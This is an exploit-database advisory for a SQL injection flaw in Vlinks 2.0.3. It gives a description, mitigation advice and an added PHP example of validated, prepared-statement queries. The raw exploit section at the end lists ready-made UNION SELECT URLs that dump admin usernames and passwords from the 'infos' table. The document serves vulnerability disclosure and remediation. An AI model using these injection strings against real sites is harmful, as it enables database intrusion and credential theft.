Vendor: Vlinks
By: JIKO(JAWAD)
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Vlinks
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: NO
Related CWE: N/A
CPE: a:vlinks:vlinks
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

vlinks SQL Injection Vulnerability

A SQL injection vulnerability exists in vlinks, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'page.php' script, and the 'id' and 'idc' parameters in the 'admin_modif_categorie.php' and 'admin_modif_partenaire.php' scripts, respectively. An attacker can use these vulnerabilities to gain access to the admin panel and extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, access to the admin panel should be restricted to trusted users.
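
The mitigation above as a hardened lookup for a numeric `id` request parameter: the value is validated as an integer and then bound to a prepared statement. This is an added example, not Vlinks code; the `liens` table, its columns, the function names and the sample inputs are constructed for illustration, and it assumes PHP 7.1+ with the pdo_sqlite extension.

```php
<?php
// Added example, not code from Vlinks. Table `liens` and its columns are hypothetical.

function parse_id($raw): ?int
{
    // Accept only a value that parses as an integer >= 1; anything else is rejected.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_link(PDO $db, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null; // caller should answer with 400/404 and run no query at all
    }
    // The value is bound as an integer parameter, never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT id, titre FROM liens WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE liens (id INTEGER PRIMARY KEY, titre TEXT)');
$db->exec("INSERT INTO liens VALUES (1, 'Example link')");

// Constructed inputs: a valid id, an unknown id, and three malformed values.
$inputs = ['1', '42', '-1 union select 0,1--', '1 OR 1=1', ''];
foreach ($inputs as $raw) {
    if (parse_id($raw) === null) {
        $result = 'rejected by validation';
    } else {
        $row = fetch_link($db, $raw);
        $result = $row ? $row['titre'] : 'no such row';
    }
    printf("%-28s => %s\n", var_export($raw, true), $result);
}
```

The same pattern applies to every parameter named in the description, including those in the admin scripts, since requiring a login does not make the queries safe.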

Exploit-DB raw data:

#########################################################################################
[!x!] Informations:
 
Name           : vlinks
Download       : http://www.vlinks.org/ =>http://www.vlinks.org/telechargements/Vlinks2.0.3.zip (And All Version)
Vulnerability  : Sql Injection
Author         : JIKO(JAWAD)
Contact        : jalikom@hotmail.com
Site           : No-ExploiT.CoM (Is Back)
Notes          : No-ExploiT.CoM Miss
#########################################################################################
[!x!] Bug:
 
Bugged file is /[path]/page.php?
 
[Note]
Pass Simple
[/Note]
 
#########################################################################################
[!x!] Exploit:
 
Exploit: http://no-exploit.com/forum/site.php?ps=1&idc=1&id=-991 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--

[Admin Panel] ! Need Login
Exploit: http://no-exploit.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
Exploit: http://no-exploit.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--
 
########################################################################################
[!x!] To: All friends
Cyber_Devil Allah with you

members [No-exploit.Com]